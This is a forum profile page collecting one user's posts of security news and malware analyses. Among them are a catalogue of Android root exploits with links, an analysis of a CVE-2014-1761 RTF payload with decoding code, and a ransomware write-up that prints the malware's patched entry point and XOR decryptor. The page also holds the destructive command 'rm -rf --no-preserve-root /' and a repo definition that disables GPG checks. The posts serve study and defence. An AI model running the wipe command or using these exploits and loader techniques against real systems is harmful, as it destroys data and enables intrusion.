Nytro
Administrators
Posts: 18791
Days Won: 741

Everything posted by Nytro

  1. I only used the free version. Well, I think I had also found an older cracked version, but I was not impressed by it.
  2. Android's New App Permissions Setup Raises Red Flags
     By Eduard Kovacs on June 13, 2014

     Google has recently made changes to the way permissions for Android applications are displayed, but experts warn that the modifications make automatic updating of mobile applications riskier than before. Under the new format, permissions requested by Android applications are organized into groups to simplify the installation process and help users make informed decisions about whether or not they want to install a certain app, Google developers noted.

     The problem, as highlighted by many security experts, is the fact that if a user gives an app access to a certain permission category, when the app is updated, it can start using other permissions in the same category without informing the user. “Once you’ve allowed an app to access a permissions group, the app may use any of the individual permissions that are part of that group. You won’t need to manually approve individual permissions updates that belong to a permissions group you’ve already accepted,” Google explained.

     For example, if an application needs to read text messages, the user must give it access to the “SMS” permissions group. If the app is updated, it can automatically access all other individual permissions in the “SMS” group (such as edit text messages, send SMS messages and receive text messages) without the user being notified. Furthermore, Google has decided to remove network communication permissions from the primary permissions screen on the basis that most apps need access to the Web in order to work. The company said it was removing apps that violate Google Play policies, and noted that systems are in place to protect users against potentially harmful elements.

     Georgia Weidman, the CEO of Bulb Security, told SecurityWeek that the changes are a “step in the complete wrong direction.” “Most users don't really care about permissions anyway, but it seems a red flag to me that if you've accepted something in a certain group you don't get notified of additional permissions in that group on update,” Weidman said.

     “Google hopes to solve the problem of apps not autoupdating by grouping permissions into categories. But you risk apps being able to silently add new permissions when they update,” Marc Rogers, principal security researcher at Lookout, told SecurityWeek in an emailed statement. “Under the new system Google will only notify users if an app requests permissions in a group the user hasn't already accepted. People need to understand that they are essentially allowing all permissions in a given category.”

     “Right now the best advice to users who are concerned about permissions is that you should go into the Play store and change the settings for apps to turn off autoupdate for any app that you do not implicitly trust,” Rogers said. “This way the app has to be manually updated and you get a chance to check its permissions with each install.”

     There are also several threads on Reddit highlighting the negative impact these changes have on security and privacy.

     Source: Android's New App Permissions Setup Raises Red Flags | SecurityWeek.Com
  3. Android Cheatsheet (updates to dweinst@insitusec.com): Vuln/Exploit List (privesc)

     Vulnerability/Exploit name | Release date | Author | Effect (root, unlock, ...) | Notes | Link
     psneuter | | scotty2 | root | | https://github.com/tmzt/g2root-kmod/blob/master/scotty2/psneuter/psneuter.c
     Exploid | 7/15/2010 | Stealth | root | | C-skills: android trickery
     GingerBreak | 5/26/2011 | Stealth | root | | C-skills: yummy yummy, GingerBreak!
     RageAgainstTheCage | | Stealth | root | |
     KillingInTheNameOf | | Stealth | root | | C-skills: adb trickery #2
     Zimperlich | 2/24/2011 | Stealth | | | C-skills: Zimperlich sources
     Zergrush | | Revolutionary | root | | https://github.com/revolutionary/zergRush/blob/master/zergRush.c ; Revolutionary - zergRush local root 2.2/2.3 [22-10: Samsung/SE update] - xda-developers
     Tacoroot | | jcase | root | HTC Recovery symlink attack to local.prop from /data/recovery/something. bliss found first, but was too slow! | https://github.com/CunningLogic/TacoRoot
     Nachoroot | | jcase | root | AMI304 Magnetic Sensor, symlink to local.prop. | https://github.com/CunningLogic/NachoRoot
     Burritoroot | | jcase | root | Typo prevented app from sending a debugging intent, caused adb to run as root | https://github.com/CunningLogic/BurritoRoot
     Gorditaroot | | jcase | install custom recovery or root | Similar to Nachoroot, different path, AMI304 Magnetic Sensor, symlink to recovery mtd device | https://github.com/CunningLogic/GorditaRoot
     Enchilada | | jcase | root | System left r/w & internal memory left as ext4? I think. Symlink attack from DCIM dir to install-recovery.sh | https://github.com/CunningLogic/Enchilada
     ZTERoot (Avail) | | jcase | root | ~70 ridiculous intents left over from engineering. Stupid OEM. | https://github.com/CunningLogic/ZTERoot ; [Exclusive] Developer Codes Left In Retail ZTE Avail (AT&T) Offer Quick And Easy Root Access
     ZTERoot (Merrit) | | jcase | root | Symlink attack from debugging/logging app | [ROOT] ZTE z990g Merit (An avail variant?) - xda-developers
     LG ICS Root | | jcase | root | Symlink attack | [ROOT] LG Intuition & LG Spectrum ICS - xda-developers
     DefyXT Root | | jcase | root | Unprotected intent allowing various permission changes. | [Root] Republic Wireless Motorola Defy XT - xda-developers
     Cyanide | | jcase | root | DefyXT Root Loggerlancher changing permissions, system mounted r/w | https://github.com/CunningLogic/Cyanide
     LG Optimus Logic | | jcase | root | |
     LG Optimus Elite | | jcase | root | LG not verifying integrity of system partition when flashing through download mode. TOT images are patchable. Probably valid on all LG devices. | [Exclusive] How To Root The Virgin Mobile LG Optimus Elite
     Pantech | | jcase | root | Pantech does not verify integrity of system partition when flashing through download mode. PDL images are patchable. | unpublished
     HTC DNA | | jcase | enable unlocking | Backupmanager sets /data 777, then symlink to mmbblk0p5 to change CID. Not root, but enables bootloader unlock | [unlock] Bootloader unlock - Updated November 26th 2012 - xda-developers
     HTC One X AT&T | | jcase | root | HTC Ready2go webapp triggering chmod 777 on file in world writable dir. Lasted a whole 4 hours. | [Exclusive] How To Root The AT&T HTC One X On Version 1.85 (Or Earlier)
     Hisense Pulse | | cj_000 | root | ro.debuggable=1 on initial firmware |
     Generic LG | | ? | root | ro.debuggable=1 on some older LGs | unpublished
     LG ADB Backdoor | | Giantpune | root | Backdoor, restarts adb as root with key |
     Poot | | Giantpune | root | Qualcomm diag device |
     Lit | | Giantpune | root | LG Backlight |
     ZTE Backdoor | | "Anonymous" | root | binary spawned root shell, password protected. |
     HTC Eris 2.1 Root | | wag3slav3 | install custom recovery | symlink attack from /data/local/something to recovery block device | ? XDA Forums
     Droid 3 Root | 8/25/2011 | bliss | root | symlink attack from /data/local/something to local.prop | Security Research by Dan Rosenberg
     Motofail | 2/11/2012 | bliss | root | symlink attack on /data/dontpanic and /data/logger | http://vulnfactory.org/public/motofail_windows.zip
     XYZ | 2/17/2012 | bliss | root | symlink attack on /pds/public/battd, /data/dontpanic, and /data/logger | http://vulnfactory.org/public/xyz_windows.zip
     LG Spectrum Root | 2/19/2012 | bliss | root | symlink attack on /data/gpscfg/gps_env.conf | http://vulnfactory.org/public/spectrum_root_windows.zip
     Megatron | 2/26/2012 | bliss | root | symlink attack on com.ti.fmrxapp | Security Research by Dan Rosenberg
     LG Esteem Root | 2/15/2012 | bliss | root | symlink attack on /data/bootlogo/bootlogopid | http://vulnfactory.org/public/LG_Esteem_Root_v2_Windows.zip
     Razr's Edge | 6/21/2012 | bliss | root | symlink attack on /data/local/12m | http://vulnfactory.org/public/razrs_edge_windows.zip
     Razr Blade | 1/15/2013 | bliss | root | symlink attack on /data/dontpanic, overwriting SmartActions .jar file to run code as system | http://vulnfactory.org/public/razr_blade.zip
     X-Factor | 10/23/2012 | bliss | change CID | symlink attack on telephony ADB restore to change permissions on /dev/diag, followed by kernel exploit (same as Poot) | [ROOT] HTC One X AT&T 2.20 Firmware - X-Factor root exploit - xda-developers
     Samsung Admire Root | 9/12/2011 | bliss | root | symlink attack on /data/log/dumpState_app_native.log | Security Research by Dan Rosenberg
     Thinkpad Tablet | 1/22/2012 | bliss | root | symlink attack on Lenovo Mobility Manager | http://vulnfactory.org/public/Thinkpad_Root_Windows.zip
     Sony Tablet S | 2/8/2012 | bliss | root | symlink attack on /log to change package.list, followed by symlink attack on "pm" (replace "lib" directory of system app to remove arbitrary files) | Security Research by Dan Rosenberg
     Xoomfail | 2/18/2012 | bliss | root | cmdclient changed perms on /data to 0777 by design | Security Research by Dan Rosenberg
     Motofail2Go | 10/16/2012 | bliss | root | symlink attack on data directory for bug2go | http://vulnfactory.org/public/motofail2go_windows.zip
     XPRT | 10/8/2012 | bliss | root | symlink attack on /data/dontpanic | http://vulnfactory.org/public/xprt_root_windows.zip
     Nandpwn | 8/4/2012 | bliss | root | Ridiculousness on Logitech Revue | https://github.com/djrbliss/revue/tree/master/nandpwn
     Motochopper | 4/9/2013 | bliss | root | | http://vulnfactory.org/public/motochopper.zip
     ADB Restore Root | | bin4ry | root | |
     Exynos-abuse | | alephzain | root | Access to system memory through /dev/exynos-mem on Exynos devices | [ROOT][SECURITY] Root exploit on Exynos - xda-developers
     IconiaRoot | | alephzain | root | | [ROOT][SECURITY] Root exploit on Exynos - xda-developers
     fr3vo | | Kevin Bruckert | root | Arbitrary kernel write in Qualcomm's MSM rotator |
     levitator | | Jon Larimer, Jon Oberheide | root | Out-of-bounds memory mapping in pvrsrvkm | http://jon.oberheide.org/files/levitator.c
     mempodroid | | saurik/zx2c4 | root | Bad kernel jazz with /proc/pid/mem and suid binaries |
     asroot (Wunderbar?) | | zinx | root | | http://code.google.com/p/flashrec/source/browse/#svn%2Ftrunk%2Fandroid-root
     Samsung Infuse 4G | 1/3/2012 | Michael Coppola | root | symlink attack on /data/data/.drm/.wmdrm/sample.hds | Rooting the Samsung Infuse 4G - Michael Coppola's Blog
  4. DarunGrim: A Patch Analysis and Binary Diffing Tool

     Introduction
     DarunGrim is a binary diffing tool. DarunGrim is a free diffing tool which provides binary diffing functionality. Binary diffing is a powerful technique to reverse-engineer patches released by software vendors like Microsoft. Especially by analyzing security patches you can dig into the details of the vulnerabilities they fix. You can use that information to learn what causes software to break. Also that information can help you write some protection code for those specific vulnerabilities. It's also used to write 1-day exploits by malware writers or security researchers.

     This binary diffing technique is especially useful for Microsoft binaries. Unlike other vendors, they release patches regularly and the patched vulnerabilities are relatively concentrated in small areas of the code. That makes the patched part more visible and apparent to the patch analyzers.

     * DarunGrim 3: DarunGrim3 is an advanced version of DarunGrim2 which provides a nice file management UI.

     Binaries: http://github.com/ohjeongwook/DarunGrim/downloads
     Source: http://github.com/ohjeongwook/DarunGrim
     License: New BSD License
     Documentation: DarunGrim 3 Installation & Usage Guide
     Blogs: Reverse Engineering | Reverse Engineering stuff

     Source: DarunGrim: A Patch Analysis and Binary Diffing Tool
  5. Extracting the payload from a CVE-2014-1761 RTF document
     Monday June 9, 2014

     Background
     In March Microsoft published security advisory 2953095, detailing a remote code execution vulnerability in multiple versions of Microsoft Office (CVE-2014-1761). A Technet blog was released at the same time which contained excellent information on how a typical malicious document would be constructed. NCC Group’s Cyber Defence Operations team used the information in the Technet blog to identify a malicious document within our malware zoo that exploited this vulnerability which appears to have been used in a targeted attack. In this blog we show one method of analysing the shellcode manually to extract the payload.

     Matching the malicious document
     The Technet blog gives a number of pointers toward a malicious document. First there is a bad header at the beginning of the document, which should be {\rtf in a real document but is {\rt{. Our sample matches this: The MSComctl object is a short way into the document, in this case an ImageComboCtl: And it is easy to identify the potential ROP chain: What will happen if the exploit is successful? If the exploit doesn’t work on our test systems, how can we manually extract the payload? We know that the document should contain something useful, either saving malicious embedded content or using a URL download/execute. But where is this shellcode?

     Analysing the shellcode
     After identifying the vulnerability we can now hunt for the shellcode which will run on successful exploitation. The Technet blog suggests the shellcode is placed near the end of the file so this is a good place to start. Upon loading into IDA the correct option to choose is 32-bit disassembly.

     Locating the shellcode
     How can we quickly identify what might be code? One common technique in shellcode is using the hashes of Windows APIs; searching for these can often yield good results. Running a small IDA Python script over the database returns some possible matches: The first four are probably misdetections but the following API names definitely look suspicious. All of them are toward the end of the file, which ends at 0x71CB1. Checking the results for Sleep() and ExitProcess() shows the following potential shellcode locations:

     Turning the bytes into code
     It is now possible to see where some of the hashed APIs might be used, which gives an indication of where the shellcode is located. We can begin to convert the unknown bytes into code (right click and choose “Code”, or use the shortcut ‘C’). If we accidentally choose the wrong place to start analysing then it is possible to end up with “junk” results, as demonstrated below: We can fix this by undefining the junk code (right click, “Undefine” or shortcut ‘U’), then making code at a slightly different offset. Very quickly the disassembly starts looking like real code:

     Calling functions by hash
     We can now see that the API hash is placed in the EBX register before a function is called, which has been manually named CallByHash by us in the disassembly above. This function uses the standard mechanism of obtaining the PEB to find loaded modules: The correct API is found using a simple ROR 0x13 (19 decimal) loop until the generated hash matches the value in EBX where the desired hash is stored (see comparison instruction at 0x71A83). This allows the shellcode to locate and call any Windows API from kernel32.dll without knowing anything about the process which loaded the RTF file or including API name strings.

     Finding ourselves – where is the RTF file?
     The shellcode next needs to find the RTF file so it can locate and save the payload. It does this by iterating over all possible file handles until a valid one is found. This will always work because Word must have the RTF file open in order to parse it. The code below tries each possible handle in turn, starting from 0x4 until 0x4000. It then calls GetFileSize, ensuring that the handle is valid by checking the return code. The code which follows is responsible for finding the start of the payload and saving it to disk. The position is first reset to the start of the file (offset 0) using SetFilePointer. The loop below then looks for the characters S18t in the document and obtains the offset if the string is found. If the characters are not present then the shellcode tries the next handle until an open file containing S18t is located. Once the payload data is found it is unobfuscated with a simple XOR loop, seen below. This is important to note for when we extract the data manually later. Following this are standard calls to GetTempPathA, CreateDirectoryA, CreateFileA and WriteFile, which save the payload to disk. Finally the shellcode calls LoadLibraryExA to launch the payload and then sleeps before calling ExitProcess to terminate Microsoft Word cleanly.

     Unusual code or shellcode trickery?
     Other typical techniques are also evident, for example this simple sequence: The constant 0x40000000 (equivalent to GENERIC_WRITE permissions) is obtained by taking the number 0x41010101 and subtracting 0x1010101, avoiding null bytes in the shellcode. The same trick is used for some API hashes, for example CloseHandle below: A simple calculation shows that the hash for CloseHandle would be 0xED00C776, which contains a null byte.

     Extracting the payload
     With the information above we can extract the payload data from the document and decode the executable which will be run. By searching for the string S18t the start of data can be found. The bytes following S18t look suspiciously like an obfuscated PE header; using our earlier information about the usage of XOR 0x4 we can test to see if this is correct: From here we can copy all of the bytes from offset 0x6c38 to the end of the file and then apply XOR 0x4 to obtain a PE file. The resulting file will contain the shellcode at the end; this could be removed if desired. Loading the payload into IDA shows a well formed executable which allows us to begin further analysis. In this instance the payload was a 425KB executable which is often called the “havex RAT”. Crowdstrike attribute the use of this malware to a group called ENERGETIC BEAR in their Global Threat Report 2013. At the time of our analysis only 1 antivirus engine of 50 on VirusTotal detected the payload as malicious, once again highlighting the malicious code arms race.

     Conclusion
     Using the techniques described above it is possible to extract the payload even if the exploit is unreliable or we have an incomplete malicious document. This allows creation of network or host indicators that allow us to prevent or detect the malicious payload. It is also a useful reminder of the speed at which known attackers will use new exploits to distribute their existing malware.

     For further information: Follow us on twitter @NCCGroupInfosec for notifications of new blog articles. If you’re an existing customer please contact your account manager if you require tailored advice and consultancy, including incident response, forensics, malicious code analysis and cyber defence services.

     Source: https://www.nccgroup.com/en/blog/2014/06/extracting-the-payload-from-a-cve-2014-1761-rtf-document/
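     The manual carving step from the post above, written out as an added example (not NCC Group's code): it reproduces the shellcode's own S18t search and XOR 0x4 decoding so an analyst can recover the embedded executable without running the exploit. The RTF-like document it carves from is constructed here, and looks_like_pe() is a minimal MZ/PE signature sanity check, not a full PE parser.

```python
"""Carve an 'S18t'-marked, XOR 0x4 obfuscated payload out of a document blob."""
import struct
from typing import Optional

MARKER = b"S18t"   # string the shellcode scans the open file for (from the post)
XOR_KEY = 0x04     # single-byte XOR used to unobfuscate the payload (from the post)


def find_payload_offset(data: bytes) -> int:
    """Offset of the first byte after the S18t marker, or -1 if absent."""
    idx = data.find(MARKER)
    return -1 if idx < 0 else idx + len(MARKER)


def xor_decode(data: bytes, key: int = XOR_KEY) -> bytes:
    """XOR every byte with key; the same call obfuscates and deobfuscates."""
    return bytes(b ^ key for b in data)


def looks_like_pe(blob: bytes) -> bool:
    """Minimal check: 'MZ' stub and e_lfanew pointing at a 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def carve_payload(document: bytes) -> Optional[bytes]:
    """Return the decoded bytes after S18t when they decode to a PE image.

    As in the post, everything from the marker to end of file is decoded, so the
    trailing shellcode is still present at the end of the returned buffer.
    """
    off = find_payload_offset(document)
    if off < 0:
        return None
    candidate = xor_decode(document[off:])
    return candidate if looks_like_pe(candidate) else None


def build_sample_document() -> bytes:
    """Constructed stand-in for the malicious RTF (not the real sample):
    bad '{\\rt{' header, filler, the S18t marker, then a XOR-0x4 encoded
    skeleton PE (DOS header with e_lfanew=0x40, PE signature, i386 machine)."""
    pe = bytearray(b"MZ" + b"\x00" * 0x3A)   # DOS header up to offset 0x3C
    pe += struct.pack("<I", 0x40)             # e_lfanew -> PE header at 0x40
    pe += b"PE\x00\x00" + b"\x4c\x01"         # signature, Machine = IMAGE_FILE_MACHINE_I386
    pe += b"payload body bytes"               # placeholder for the rest of the image
    return b"{\\rt{" + b"A" * 64 + MARKER + xor_decode(bytes(pe))
```

     On a real document, replace build_sample_document() with the file bytes; the post notes the marker sat at a fixed offset (0x6c38) in their sample, so find_payload_offset() is only a convenience over reading that offset directly.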
  6. rm -rf remains

     Just for fun, I decided to launch a new Linux server and run rm -rf / as root to see what remains. As I found out, rm lives in the future with idiots like me, so you have to specify --no-preserve-root to kick this exercise off.

     # rm -rf --no-preserve-root /

     After committing this act of tomfoolery, great utilities like /bin/ls /bin/cat /bin/chmod /usr/bin/file will all be gone! You should still have your connection over SSH as well as your existing bash session. This means you have all the bash builtins, like echo.

     Full article: rm -rf remains
  7. An Introduction to Recognizing and Decoding RC4 Encryption in Malware

     There is something that we come across almost daily when we analyze malware in the VRT: RC4. We recently came across CVE-2014-1776 and like many malware samples and exploits we analyze, RC4 is used to obfuscate or encrypt what it is really doing. There are many ways to implement RC4 and it is a very simple, small algorithm. This makes it very common in the wild and in various standard applications. Open-source C implementations can be found on several websites such as Apple.com and OpenSSL.org.

     What is RC4?
     RC4 was designed by Ron Rivest of RSA Security in 1987. RC4 is a fast and simple stream cipher that uses a pseudo-random number generation algorithm to generate a key stream. This key stream can be used in an XOR operation with plaintext to generate ciphertext. The same key stream can then be used in an XOR operation against the ciphertext to generate the original plaintext. While it is still common in malware, RC4 has been legitimately implemented in a number of areas where speed and privacy are of concern. In the past, both WEP and TLS used RC4 to protect data sent across the wire. However, last Fall, Microsoft recommended that customers disable RC4 by enabling TLS1.2 and AES-GCM. For more information including a detailed history of RC4, check out the Wikipedia article.

     Why is it used in malware?
     Increasingly, we find that RC4 is used to encode data that is sent to a remote server to be decrypted on the other side using a pre-shared key. This makes detection a bit trickier (but not impossible) and also makes it harder to determine exactly what is being sent across the wire. What we will usually do when we think we’ve come across some sort of encryption is determine the source of it and whether the data being sent is static (for matching purposes) and what exactly that data is.

     Full article: VRT: An Introduction to Recognizing and Decoding RC4 Encryption in Malware
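     RC4 as the post describes it, written out as an added example (not the VRT's code): the key-scheduling and keystream-generation steps, the single XOR routine that both encrypts and decrypts, and a heuristic scanner that looks for the 256-byte S-box permutation an RC4 key schedule leaves behind in process memory, which is one practical way to recognize the cipher in an unpacked sample. The memory blob it scans is constructed here; the test vectors are the public ones from the Wikipedia article the post points to.

```python
"""Pure-Python RC4 plus a memory-dump heuristic for spotting its S-box."""
from typing import Iterator, List, Tuple


def rc4_ksa(key: bytes) -> List[int]:
    """Key-scheduling algorithm: permute the identity table 0..255 using the key."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(s: List[int]) -> Iterator[int]:
    """Pseudo-random generation algorithm: yields keystream bytes indefinitely."""
    s = s[:]          # work on a copy so the caller's S-box is left intact
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt: the same XOR with the keystream does both."""
    ks = rc4_keystream(rc4_ksa(key))
    return bytes(b ^ next(ks) for b in data)


def is_permutation_of_256(block: bytes) -> bool:
    """True when block holds every value 0..255 exactly once."""
    return len(block) == 256 and len(set(block)) == 256


def find_rc4_sbox(blob: bytes) -> List[Tuple[int, str]]:
    """Scan a memory blob for 256-byte windows that are a full permutation.

    A keyed RC4 S-box is a permutation of 0..255 with no visible order; the
    identity table (0, 1, 2, ... 255) is what the KSA starts from, so seeing
    it usually means the key schedule has not run yet (or the table is a
    static constant).  Windows are non-overlapping once a hit is found.
    """
    identity = bytes(range(256))
    hits: List[Tuple[int, str]] = []
    off = 0
    while off + 256 <= len(blob):
        window = blob[off:off + 256]
        if is_permutation_of_256(window):
            kind = "identity (KSA not yet run)" if window == identity else "keyed S-box"
            hits.append((off, kind))
            off += 256
        else:
            off += 1
    return hits


def demo_blob() -> bytes:
    """Constructed stand-in for a process memory region: NOP sled padding,
    the S-box produced by scheduling the key b'Key', then zero padding."""
    return b"\x90" * 37 + bytes(rc4_ksa(b"Key")) + b"\x00" * 50
```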
  8. CentOS 7 Public QA Release
     Friday, 13 June 2014, Jeff Sheltren

     We are happy to announce the immediate availability of the first CentOS 7 QA Release.

     !!! This is a QA release only and not the final CentOS 7 release !!!

     In the past, CentOS QA testing has been performed by a small group of people within the CentOS community. We are happy that we are now able to open this up to the wider community to get early feedback and bug reports prior to the 7 release.

     CentOS 7 QA release is available for download at: Index of /

     We are first populating individual RPMs in their respective build directories. Once there is a working base install tree, it will be made available at the same URL.

     Please note the following:
     - This is NOT the final CentOS 7 release. Packages, ISOs, and install media *will* change between this release and the final 7 release.
     - The packages posted at the above URL will likely be updated in-place before the final release.
     - Things may be broken! Don’t install this on your production servers. Consider it a beta/preview release.
     - Help us make the 7 release better by reporting bugs at My View - CentOS Bug Tracker
     - This is not an officially supported release. If you have questions, aren’t sure if you’ve found a bug, etc., please ask in #centos-devel on Freenode, or email the centos-devel email list.
     - Packages in the QA release are *not* GPG-signed. The final 7 release will contain gpg-signed packages as usual.
     - Upgrading from the QA release to the final 7 release may be possible, but it’s not supported or documented in any way. Expect that you will need to re-install when 7 final is released.

     We appreciate any and all bug reports at My View - CentOS Bug Tracker (please also check upstream bugzilla.redhat.com and link to those bugs when filing a new CentOS issue), and assistance with the “Branding Hunt” (see [CentOS-devel] The Branding Hunt - howto).

     https://access.redhat.com/site/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/7.0_Release_Notes/part-Red_Hat_Enterprise_Linux-7.0_Release_Notes-Known_Issues.html contains a list of known issues at the time of the upstream release.

     Currently, we only have RPM packages online, but will be bringing installable media online as soon as we have it ready. Again, this is NOT a final release. It may harm nearby puppies, kittens, or other (cute) animals and/or servers. This is our first attempt at opening up CentOS to the wider community, so please bear with us as we work through any issues that arise with the process. As always, feedback is welcome on the email list or on IRC (#centos-devel on Freenode).

     Edit: Even though we don’t yet have an installable tree in place, you can point an existing el7beta/el7rc install to the buildlogs repo with the following yum repo definitions (for example /etc/yum.repos.d/centos-buildlogs.repo):

         [centos-qa-03]
         name=CentOS Open QA – c7.00.03
         baseurl=Index of /c7.00.03
         enabled=1
         gpgcheck=0

         [centos-qa-04]
         name=CentOS Open QA – c7.00.04
         baseurl=Index of /c7.00.04
         enabled=1
         gpgcheck=0

     Thanks, and enjoy the release!
     -Jeff Sheltren on behalf of the CentOS QA Team

     Source: CentOS 7 Public QA Release – Seven.CentOS.org
  9. Ransomware infecting user32.dll

Over the past months we’ve been monitoring a new variant of the Department of Justice (DOJ) ransomware. To date there is nothing written about this new variant on the internet. This blog item aims to address this.

Analysis of this particular ransomware shows that the method to infect victims is different compared to previous ransomware samples. Instead of dropping an executable on the system it infects the Windows system DLL: user32.dll. This file is typically located in:

    C:\Windows\System32\user32.dll
    or
    C:\Windows\SysWOW64\user32.dll

So far we’ve observed that the ransomware is only infecting the 32-bit version of user32.dll.

Static detection

Our support desk helped a victim in January 2014. Four months later, detection is still poor:

Resource section

The ransomware enlarges the resource section of user32.dll as can be seen in the table below:

    Original user32.dll                          Infected user32.dll
    name    va       vsize    rawsize            name    va       vsize    rawsize
    .text   0x1000   0x5f283  0x5f400            .text   0x1000   0x5f283  0x5f400
    .data   0x61000  0x1180   0xc00              .data   0x61000  0x1180   0xc00
    .rsrc   0x63000  0x2a088  0x2a200            .rsrc   0x63000  0x33a88  0x33c00
    .reloc  0x8e000  0x2de4   0x2e00             .reloc  0x8e000  0x2de4   0x2e00

Analysis of the increased resource section in this file shows that it contains an encrypted payload with a decryptor embedded. We will show how the malware gets active once it has successfully infected the user32.dll file.
EntryPoint patched

The code in the entrypoint of an infected user32.dll is patched with a jump to AlignRects, as can be seen below:

Original:

    UserClientDllInitialize:
    7e41b217 8B FF            mov edi, edi
    7e41b219 55               push ebp
    7e41b21a 8B EC            mov ebp, esp
    7e41b21c 83 7D 0C 01      cmp [ebp+0xC], 1
    7e41b220 75 05            jnz 0x7e41b227
    7e41b222 E8 5D 07 00 00   call 0x7e41b984
    7e41b227 5D               pop ebp
    7e41b228 90               nop
    7e41b229 90               nop
    7e41b22a 90               nop
    7e41b22b 90               nop
    7e41b22c 90               nop
    7e41b22d 8B FF            mov edi, edi
    7e41b22f 55               push ebp
    7e41b230 8B EC            mov ebp, esp

Patched:

    UserClientDllInitialize:
    7e41b217 8B FF            mov edi, edi
    7e41b219 55               push ebp
    7e41b21a 8B EC            mov ebp, esp
    7e41b21c 83 7D 0C 01      cmp [ebp+0xC], 1
    7e41b220 75 0E            jnz 0x7e41b230
    7e41b222 E8 00 00 00 00   call 0x7e41b227
    7e41b227 83 04 24 0A      add [esp], 0xa
    7e41b22b E9 B0 22 05 00   jmp AlignRects
    ________________________________________
    7e41b230 8B EC            mov ebp, esp

The code at AlignRects is not the original, but is replaced with code that allocates a new block of executable memory. Hereafter it copies the encrypted payload from the resource section to this newly allocated memory.

    AlignRects:
    7e46d4e0 leave
    7e46d4e1 pusha
    7e46d4e2 push ebp
    7e46d4e3 mov ebp, esp
    7e46d4e5 sub esp, 8
    7e46d4e8 mov eax, [ebp+0x4C]          ; EAX becomes base-address of
                                          ; user32.dll (7E410000)
    7e46d4eb mov ecx, eax
    7e46d4ed add eax, 0x13bc
    7e46d4f2 mov eax, [eax]               ; EAX becomes address of
                                          ; NtQueryVirtualMemory
    7e46d4f4 add eax, 0xfffff5f0          ; EAX becomes address of
                                          ; NtAllocateVirtualMemory
    7e46d4f9 push 0x40
    7e46d4fb push 0x3000
    7e46d500 lea ecx, [ebp-0x4]
    7e46d503 mov [ecx], 0xc576
    7e46d509 push ecx
    7e46d50a push 0
    7e46d50c lea ecx, [ebp-0x8]
    7e46d50f mov [ecx], 0
    7e46d515 push ecx
    7e46d516 push 0xff
    7e46d518 call eax                     ; Call NtAllocateVirtualMemory
    7e46d51a mov edi, [ebp-0x8]           ; EDI = allocated address
    7e46d51d mov eax, edi
    7e46d51f mov esi, [ebp+0x4C]          ; ESI = base-address of
                                          ; user32.dll (7E410000)
    7e46d522 add esi, 0x8d200             ; ESI = address of encrypted payload
                                          ; in resource section
    7e46d528 mov ecx, 0x98bb
    7e46d52d rep movs es:[edi], ds:[esi]  ; Copy to allocated
                                          ; (executable) range
    7e46d52f leave
    7e46d530 add eax, 0x981e              ; EAX = address of decryption code
    7e46d535 jmp eax                      ; Start decryption !!

As can be seen from this code an executable block of memory is allocated. In order to do that, the address of NtAllocateVirtualMemory is calculated using the address of NtQueryVirtualMemory, which was obtained from the IAT of user32.dll. The encrypted payload is copied into the newly allocated range of memory. This encrypted payload contains a small piece of decryption code, located near the end of the encrypted payload. This decryption code is shown below:

    0:000> r
    eax=0029981e ebx=7e41b217 ecx=00000000 edx=7c90e514 esi=7e4a6abb edi=002998bb
    eip=0029981e esp=0007f9d4 ebp=0007fa10 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
    0:000> u eax l20
    0029981e call    00299823
    00299823 pop     edx                     EDX = current location !
    00299824 sub     edx,7FFA2F22h
    0029982a push    esi
    0029982b lea     esi,[edx+7FFA2F1Dh]     ESI = allocated mem-base (290000)
    00299831 mov     ecx,981Eh               ECX = size to decrypt (num bytes)
    00299836 sub     esi,ecx
    00299838 push    esi
    00299839 mov     ebx,6FAAEh              The XOR key (BL only, so AEh)
    0029983e xor     byte ptr [esi],bl       Decrypt byte-by-byte
    00299840 inc     esi
    00299841 inc     ebx                     Modify XOR key for each byte (+1)
    00299842 loop    0029983e
    00299844 pop     eax
    00299845 pop     ecx
    00299846 mov     dword ptr [eax+12h],ecx
    00299849 jmp     eax                     Jump to allocated mem-base, which is now decrypted.

The decryption of the payload uses a XOR based decryption scheme where the XOR value for each byte to decrypt is incremented after each operation. Once all bytes in the allocated memory range are decrypted, the now plain code is executed. Note the first two instructions of this decryption code, where a call/pop combination is used to obtain the current address. This makes the decryption code position independent. The only ‘fixed’ values in this code are the size of the encrypted payload and the XOR key, so automating the payload and decryptor to avoid static detection can be easily accomplished.

Once the ransomware becomes active, some typical ransomware behavior is performed:

- Windows Safe Mode is disabled
- Task Manager is blocked
- Command Prompt is blocked
- Registry Editor is blocked
- … and of course the police themed picture is shown where a ransom fee is demanded in order to release the PC (see picture at the top of this article).

Victims can use the very easy-to-use HitmanPro.Kickstart to get rid of police themed ransomware infection.

Blocking CD-ROM drives

A new property of this particular ransomware is that it disables CD-ROM drives. This makes it for some computers harder to clean the system as is explained below.

When HitmanPro detects a system file that is infected, it searches for a white-listed variant on the computer. This is because Windows tends to keep a copy of system files on multiple locations on the hard disk. If HitmanPro cannot find a white-listed known safe version, it prompts for the Windows installation CD/DVD media that came with the computer. This is a very useful feature of HitmanPro and it has been in HitmanPro for years to return infected system files to pristine state! But since this new ransomware infection blocks access to the CD/DVD the user can no longer provide the Windows installation media for original files.

New Cloud Service

Today we release a BETA build of HitmanPro that queries a new HitmanPro-cloud service that can provide a clean system file so that the user no longer has to provide Windows installation media.

32-bit: http://dl.surfright.nl/HitmanProBeta.exe
64-bit: http://dl.surfright.nl/HitmanProBeta_x64.exe

Samples:
3AF4FA2BFFAAB37FD557AE8146AE0A29BA0FAF6D99AD8A1A8D5BF598AC9A23D1
3A061EE07D87A6BB13E613E000E9F685CBFFB96BD7024A9E7B4CB0BE9A4AF38C
